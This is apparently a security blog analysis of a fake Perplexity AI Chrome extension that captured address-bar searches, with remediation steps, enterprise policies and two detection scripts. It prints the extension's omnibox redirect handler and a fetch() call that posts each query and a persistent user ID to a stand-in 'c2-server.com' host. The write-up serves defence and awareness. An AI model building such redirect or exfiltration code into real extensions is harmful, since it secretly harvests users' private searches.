Malicious Perplexity Chrome Extension Intercepted User Searches

A counterfeit Perplexity AI Chrome extension was discovered intercepting user search queries and address bar inputs, redirecting traffic through attacker-controlled domains. The malicious extension mimicked the legitimate Perplexity AI service, exploiting user trust to harvest browsing data and potentially monetize hijacked searches. Users who installed the fake extension from unofficial sources faced significant privacy risks and data exposure. This incident highlights the ongoing threat of malicious browser extensions targeting popular AI services.

Introduction

Browser extensions have become a prime vector for cybercriminals seeking to compromise user data and manipulate web traffic. In a recent campaign, threat actors developed a fraudulent Chrome extension impersonating Perplexity AI—a popular AI-powered search engine. The malicious extension intercepted search queries entered directly into Chrome’s address bar (omnibox) and redirected users through attacker-controlled infrastructure.

Unlike traditional adware that simply injects advertisements, this extension operated as a sophisticated search hijacker, capturing real-time user inputs before they reached legitimate search providers. The attack demonstrates how cybercriminals leverage brand recognition of trending AI services to distribute malware and monetize stolen traffic through affiliate schemes and data collection.

This analysis examines the technical mechanisms employed by the malicious extension, the risks it posed to affected users, and defensive measures to prevent similar compromises.

Background & Context

Perplexity AI has gained significant popularity as an alternative search interface powered by large language models. As with any trending technology, threat actors quickly recognized an opportunity to exploit user interest through malicious impersonation.

Browser extension-based threats have evolved considerably in recent years. Modern malicious extensions employ sophisticated techniques including:

  • Permission abuse: Requesting broad access to browsing data under legitimate-sounding pretexts
  • Brand impersonation: Copying logos, names, and descriptions of popular services
  • Traffic monetization: Redirecting searches through affiliate networks or selling harvested data
  • Persistence mechanisms: Making removal difficult through multiple installation hooks

The Chrome Web Store implements security measures to prevent malicious extensions, but threat actors frequently circumvent these protections by distributing malware through third-party websites, phishing campaigns, and social engineering tactics. Users seeking free access to premium features or early releases often download extensions from untrusted sources, creating attack opportunities.

Search hijacking specifically represents a lucrative threat vector. By intercepting and redirecting search queries, attackers can:

  • Earn affiliate commissions from sponsored search results
  • Harvest valuable data about user interests and behavior
  • Inject malicious results or phishing links
  • Profile users for targeted attacks

Technical Breakdown

The malicious Perplexity extension implemented several technical mechanisms to intercept and exfiltrate user data:

Manifest Permissions

The extension requested excessive permissions in its manifest file, including:

{
  "permissions": [
    "tabs",
    "webNavigation",
    "webRequest",
    "webRequestBlocking",
    "*://*/*"
  ]
}

These permissions (a Manifest V2 layout, since host patterns sit inside "permissions" and webRequestBlocking no longer exists in Manifest V3) granted the extension:

  • Host access to every http and https site ("*://*/*", equivalent in effect to "<all_urls>"), which is what makes the request listeners below apply to all traffic
  • Ability to observe every navigation (webNavigation) and to read the URL and title of every open tab (tabs)
  • Power to intercept, cancel or redirect requests synchronously, before they leave the browser (webRequest together with webRequestBlocking)

The tabs permission alone does not expose page content; reading or altering a page additionally requires a content script, which the broad host permission already allows the extension to inject anywhere.

Omnibox Hijacking

The extension also registered an omnibox keyword. A detail worth getting right: the chrome.omnibox API only fires after the user types the extension's keyword followed by a space, so on its own it never sees an ordinary address bar search. Full capture of default searches comes from the webRequest permissions above (rewriting requests bound for the configured search engine) or from a chrome_settings_overrides search_provider entry that replaces the default engine outright. Input that did reach the omnibox handler was redirected before the default search engine was ever contacted:

// Omnibox handler in the Manifest V2 background script. Fires when the user has
// typed the extension's keyword and pressed Enter; `text` is the rest of the input.
chrome.omnibox.onInputEntered.addListener(function (text) {
  var redirectUrl = "https://attacker-domain.com/search?q=" + encodeURIComponent(text);
  // Replace the current tab's URL instead of letting the default search run
  chrome.tabs.update({ url: redirectUrl });
});

Because the redirect happens inside the extension, the browser never contacts the user's own search engine; the only visible cue was the extension's name shown beside the keyword in the omnibox, which a casual user is unlikely to notice.

Traffic Redirection

Captured searches were redirected through a chain of attacker-controlled domains:

  • Initial redirect to data collection endpoint
  • Logging of search query, timestamp, and user identifier
  • Secondary redirect to legitimate search results (often Bing or Google)
  • Affiliate parameters appended to monetize clicks

The redirection chain obscured the malicious activity from casual users while generating revenue for the threat actors:

User Query → Extension Capture → attacker-domain.com/track 
→ affiliate-network.com/?ref=XXXXX → search-engine.com/results
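The chain above can be recognised from the outside. The following is an added example, not code from the article or from the extension: given the ordered list of URLs observed for one navigation (from a proxy log, a browser history export or the DevTools network panel), it looks for the three traits of the redirection chain described here: the same query forwarded across unrelated hosts, affiliate or partner parameters appearing after the first hop, and a real search engine reached only after a detour. Domains ending in .example and the sample chains are constructed placeholders standing in for attacker-domain.com and affiliate-network.com; the parameter names and the two-signal threshold are assumptions chosen for illustration.

```javascript
// Added example (not from the article): classify a redirect chain observed for one
// navigation as search hijacking or not. Domains ending in .example are constructed
// placeholders standing in for the article's attacker-domain / affiliate-network.
const SEARCH_ENGINE_HOSTS = new Set(["www.google.com", "www.bing.com", "duckduckgo.com"]);
const QUERY_KEYS = ["q", "query", "search", "text"];              // where a query usually travels
const AFFILIATE_KEYS = new Set(["ref", "aff", "affid", "subid", "pc", "form"]); // monetisation tags (assumed list)

// Return the search query carried by a URL, normalised, or null if there is none.
function extractQuery(url) {
  for (const key of QUERY_KEYS) {
    const value = url.searchParams.get(key);
    if (value) return value.trim().toLowerCase();
  }
  return null;
}

// Analyse an ordered list of URLs (first request -> final landing page).
function analyzeChain(chain) {
  const hops = chain.map((u) => new URL(u));
  const findings = [];
  const query = extractQuery(hops[0]);

  // 1. The same query is forwarded across unrelated hosts.
  const carriers = new Set(
    hops.filter((h) => query && extractQuery(h) === query).map((h) => h.hostname)
  );
  if (carriers.size >= 2) findings.push(`query forwarded across ${carriers.size} hosts`);

  // 2. Hops after the first carry affiliate/partner parameters.
  const affiliateHops = hops.slice(1).filter((h) =>
    [...h.searchParams.keys()].some((k) => AFFILIATE_KEYS.has(k.toLowerCase()))
  );
  if (affiliateHops.length > 0) findings.push(`affiliate parameters on ${affiliateHops.length} hop(s)`);

  // 3. The chain ends on a real search engine after passing through non-search hosts.
  const last = hops[hops.length - 1];
  const detour = hops.slice(0, -1).some((h) => !SEARCH_ENGINE_HOSTS.has(h.hostname));
  if (hops.length > 1 && SEARCH_ENGINE_HOSTS.has(last.hostname) && detour) {
    findings.push(`reached ${last.hostname} only after ${hops.length - 1} intermediate hop(s)`);
  }

  // Two independent signals are required so a single affiliate link is not flagged.
  return { hijacked: findings.length >= 2, findings };
}

// Constructed sample chains.
const HIJACKED_CHAIN = [
  "https://attacker-domain.example/search?q=tax+refund+status",
  "https://attacker-domain.example/track?q=tax+refund+status&uid=7f3a9c",
  "https://affiliate-network.example/?ref=XXXXX&q=tax+refund+status",
  "https://www.bing.com/search?q=tax+refund+status&pc=XXXXX",
];
const NORMAL_SEARCH = ["https://www.bing.com/search?q=tax+refund+status"];
const NORMAL_OUTBOUND = [
  "https://www.google.com/url?q=https://example.com/article",
  "https://example.com/article",
];

if (typeof require !== "undefined" && require.main === module) {
  for (const chain of [HIJACKED_CHAIN, NORMAL_SEARCH, NORMAL_OUTBOUND]) {
    console.log(chain[0], "=>", JSON.stringify(analyzeChain(chain)));
  }
}
```

Run it with node; the hijacked chain yields all three findings, while a direct search and a normal outbound click through a search engine's redirector yield none. Requiring two signals rather than one is deliberate: plenty of legitimate links carry a ref parameter, and search engines legitimately redirect through their own hosts.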

Data Exfiltration

The extension transmitted collected data to remote servers over HTTPS, so the payload was not visible to a network observer even though the destination host was:

// Exfiltration call from the background script. searchText is the captured query;
// userId is a persistent identifier the extension generated so the same user could be
// recognised across sessions.
fetch('https://c2-server.com/collect', {
  method: 'POST',
  headers: {'Content-Type': 'application/json'},
  body: JSON.stringify({
    query: searchText,
    timestamp: Date.now(),
    uid: userId
  })
});

Harvested data therefore included the search query itself, the time it was made, and a persistent user identifier that ties every query from one browser profile together.

Impact & Risk Assessment

Immediate Risks

Privacy Violation: All search queries and address bar inputs were captured and transmitted to attacker infrastructure. This included potentially sensitive searches related to health, finances, personal relationships, and confidential business matters.

Data Monetization: Stolen search data could be sold to data brokers, used for targeted advertising, or leveraged for social engineering attacks against high-value targets.

Credential Exposure: Users entering credentials or sensitive information directly into the address bar (a common mistake) exposed this data to the attackers.

Secondary Threats

Profile Development: Continuous monitoring enabled attackers to build comprehensive behavioral profiles, mapping interests, schedules, and online habits.

Supply Chain Risk: Organizations whose employees installed the extension potentially exposed corporate search patterns and competitive intelligence.

Future Targeting: Harvested data provided foundation for subsequent spear-phishing campaigns or account compromise attempts.

Affected Population

While precise infection numbers remain unknown, indicators suggest hundreds to potentially thousands of installations before detection. Users who downloaded the extension from third-party software repositories, tutorial sites, or through search result poisoning faced exposure.

Vendor Response

Perplexity AI issued public warnings about the fraudulent extension, emphasizing they do not currently offer an official Chrome extension. The company established verification channels for users to confirm legitimate products and reported the malicious extension to Google’s security team.

Google’s Chrome Web Store security team investigated reports and confirmed the extension was distributed outside official channels. Since the malicious software never appeared in the legitimate Chrome Web Store, takedown focused on identifying and neutralizing the distribution infrastructure.

Domain registrars received abuse complaints for the command-and-control servers and redirect domains involved in the operation. Several domains were subsequently suspended, disrupting the attacker’s monetization infrastructure.

Law enforcement notification was initiated through appropriate channels, though attribution remains under investigation. The operation’s relatively sophisticated technical implementation suggests involvement of experienced cybercriminals rather than opportunistic actors.

Mitigations & Workarounds

Immediate Actions for Affected Users

Remove the Extension:

  • Navigate to chrome://extensions/
  • Enable “Developer mode” so that extension IDs are displayed next to each entry
  • Locate any Perplexity-related extensions
  • Click “Remove” and confirm deletion

Clear Browser Data:

Settings → Privacy and Security → Clear Browsing Data
Select: Cookies, Cache, Site Settings
Time Range: All Time

Reset Search Engine Settings:

Settings → Search Engine → Manage Search Engines
Remove unknown or suspicious entries
Restore preferred default search engine

Change Compromised Credentials: Any passwords or sensitive information entered during the infection period should be changed immediately, prioritizing financial accounts and email.

Verification Steps

Confirm removal by checking:

# Extension IDs are recorded under "extensions.settings" in the profile's Secure Preferences file
grep -i perplexity ~/Library/Application\ Support/Google/Chrome/Default/Secure\ Preferences   # macOS
grep -i perplexity ~/.config/google-chrome/Default/Secure\ Preferences                         # Linux

On Windows the same file is at %LOCALAPPDATA%\Google\Chrome\User Data\Default\Secure Preferences. No results should appear if the extension was fully removed. A search on the name alone misses an extension that was installed under a different title, so also compare the IDs listed in that file against the entries chrome://extensions/ shows with Developer mode enabled.

Detection & Monitoring

Endpoint Monitoring

Security teams should monitor for indicators including:

Suspicious Extension Installation:

  • Extensions with excessive permissions
  • Software installed from non-standard sources
  • Extensions mimicking popular AI services

Network Traffic Patterns:

Outbound HTTPS POST requests to unknown domains
Frequent connections to recently-registered domains
Traffic patterns correlating with user search behavior
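The third pattern, POST traffic timed with the user's searches, is the one that separates a search-tracking beacon from ordinary telemetry. The following is an added example, not code from the article or from any product: it reads simplified proxy log lines, treats GETs to a search engine's query path as search events, and flags any destination outside an allowlist whose POSTs from the same client mostly fall within a few seconds of a search. The log format, every line in it, the .example hosts, the window and the thresholds are constructed for illustration.

```javascript
// Added example (not from the article): find hosts whose POST traffic is timed with
// the user's searches. Log format, all lines and the .example hosts are constructed.
const SEARCH_HOSTS = new Set(["www.google.com", "www.bing.com", "duckduckgo.com"]);
const ALLOWED_POST_HOSTS = new Set([...SEARCH_HOSTS, "api.github.com", "login.microsoftonline.com"]);
const WINDOW_MS = 3000;   // a capture-then-redirect beacon lands within a few seconds of the search
const MIN_POSTS = 3;      // ignore one-off submissions such as a single crash report
const MIN_RATIO = 0.75;   // share of a host's POSTs that must coincide with searches

// Constructed proxy log: "<iso-time> <client-ip> <method> <host> <path>"
const SAMPLE_LOG = `
2025-01-14T09:12:01Z 10.0.0.7 GET www.bing.com /search?q=quarterly+forecast
2025-01-14T09:12:00Z 10.0.0.7 POST c2-server.example /collect
2025-01-14T09:12:05Z 10.0.0.7 GET api.github.com /repos/org/repo
2025-01-14T09:12:30Z 10.0.0.7 POST api.github.com /graphql
2025-01-14T09:15:42Z 10.0.0.7 GET www.bing.com /search?q=merger+rumor
2025-01-14T09:15:41Z 10.0.0.7 POST c2-server.example /collect
2025-01-14T09:20:10Z 10.0.0.7 GET www.google.com /search?q=flight+to+berlin
2025-01-14T09:20:09Z 10.0.0.7 POST c2-server.example /collect
2025-01-14T09:25:00Z 10.0.0.7 POST crash-reports.example /submit
2025-01-14T09:31:00Z 10.0.0.9 GET duckduckgo.com /?q=lunch+near+me
2025-01-14T09:40:00Z 10.0.0.9 POST c2-server.example /collect
`.trim();

function parseLine(line) {
  const [time, client, method, host, path] = line.trim().split(/\s+/);
  return { ts: Date.parse(time), client, method, host, path };
}

// A search event: GET to a search engine's query path ("/search?q=" or "/?q=").
function isSearch(e) {
  return e.method === "GET" && SEARCH_HOSTS.has(e.host) && /^\/(search)?\?q=/.test(e.path);
}

// Returns { perHost: { host: { posts, correlated } }, flagged: [host, ...] }.
function correlatePosts(logText) {
  const events = logText.split("\n").filter(Boolean).map(parseLine);
  const searches = events.filter(isSearch);
  const perHost = {};
  for (const e of events) {
    if (e.method !== "POST" || ALLOWED_POST_HOSTS.has(e.host)) continue;
    if (!perHost[e.host]) perHost[e.host] = { posts: 0, correlated: 0 };
    const stats = perHost[e.host];
    stats.posts += 1;
    // Same client, within the window on either side: the beacon may precede the
    // search it reports, because the capture happens before the final redirect.
    const near = searches.some((s) => s.client === e.client && Math.abs(s.ts - e.ts) <= WINDOW_MS);
    if (near) stats.correlated += 1;
  }
  const flagged = Object.entries(perHost)
    .filter(([, s]) => s.posts >= MIN_POSTS && s.correlated / s.posts >= MIN_RATIO)
    .map(([host]) => host);
  return { perHost, flagged };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(JSON.stringify(correlatePosts(SAMPLE_LOG), null, 2));
}
```

On the sample log, c2-server.example receives four POSTs of which three coincide with a search from the same client, so it is flagged; the single crash report is below the minimum count and the GitHub traffic is allowlisted. In production the allowlist should come from your proxy's known-good categories, and the time window should be tuned against a week of clean logs before alerting on it.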

Registry and File System Changes (Windows):

HKEY_LOCAL_MACHINE\SOFTWARE\Google\Chrome\Extensions\<extension-id>
HKEY_CURRENT_USER\Software\Google\Chrome\Extensions\<extension-id>
(on 64-bit Windows also SOFTWARE\Wow6432Node\Google\Chrome\Extensions)
Keys here register externally installed extensions; compare the IDs against the approved list.
Installed copies live under %LOCALAPPDATA%\Google\Chrome\User Data\Default\Extensions\<extension-id>\<version>\manifest.json

Enterprise Controls

Organizations should implement:

  • Extension Allowlisting: Chrome Enterprise policy (ExtensionInstallBlocklist plus ExtensionInstallAllowlist) restricting installations to approved extension IDs, which also blocks sideloading from third-party sites
  • DNS Filtering: Block known malicious domains associated with the campaign
  • Endpoint Detection Rules: Alert on suspicious extension installations
  • User Education: Training on verifying extension authenticity

Behavioral Indicators

Monitor for:

  • Unexpected search result redirections
  • Modified address bar behavior
  • Increased latency in search operations
  • Unknown domains appearing in network logs

Best Practices

Extension Security Hygiene

Verify Before Installing:

  • Only download extensions from official Chrome Web Store
  • Confirm developer identity matches legitimate vendor
  • Review permissions requested against actual functionality
  • Check user reviews and installation counts

Regular Audits:
Periodically review installed extensions:

chrome://extensions/ 
Disable unused extensions
Remove unfamiliar software
Verify all extensions remain necessary

Permission Awareness:
Be suspicious of extensions requesting:

  • Access to all websites
  • Ability to read and modify data
  • Network interception capabilities
  • Background execution permissions

Organizational Controls

Chrome Enterprise Policies (the older ExtensionInstallBlacklist/Whitelist names were replaced by Blocklist/Allowlist in Chrome 86; the JSON form below is what a managed policy file on Linux uses, and the same keys apply through a configuration profile on macOS or the registry on Windows):

{
  "ExtensionInstallBlocklist": ["*"],
  "ExtensionInstallAllowlist": [
    "approved-extension-id-1",
    "approved-extension-id-2"
  ],
  "ExtensionInstallForcelist": [
    "security-extension-id;https://clients2.google.com/service/update2/crx"
  ]
}

Blocking "*" and allowlisting specific IDs is what stops a sideloaded extension like this one, since the block applies to any install source, not just the Chrome Web Store. A forcelist entry takes the form "id;update_url", with the Web Store update service shown above.

Security Awareness Training:

  • Educate users about extension risks
  • Establish approval processes for new extensions
  • Provide channels for reporting suspicious software
  • Simulate extension-based phishing scenarios

Personal Security Measures

  • Enable Chrome Sync with strong authentication to back up legitimate settings
  • Use password managers instead of typing credentials into address bar
  • Implement two-factor authentication on critical accounts
  • Subscribe to security advisories for frequently-used services

Key Takeaways

🔴 Brand Impersonation Remains Effective: Threat actors successfully exploited Perplexity AI’s popularity to distribute malware, demonstrating the continued effectiveness of impersonation attacks.

🔴 Browser Extensions Pose Significant Risk: Extensions with broad permissions can compromise all browsing activity, making them high-value targets for attackers.

🔴 Search Hijacking Enables Monetization: Intercepted search traffic generates revenue through affiliate schemes while harvesting valuable user data.

🔴 Official Distribution Channels Are Critical: Installing software from unofficial sources dramatically increases compromise risk.

🔴 Detection Requires Active Monitoring: Malicious extensions often operate silently, requiring deliberate verification to identify.

🔴 Privacy Impact Extends Beyond Immediate Theft: Harvested search data enables long-term profiling and future targeted attacks.

Organizations and individuals must treat browser extensions as critical security components requiring careful vetting, ongoing monitoring, and regular audits. The intersection of AI service popularity and extension distribution creates persistent opportunities for threat actors that demand heightened vigilance.

Stay updated at https://cydhaal.com — Your Daily Dose of Cyber Intelligence.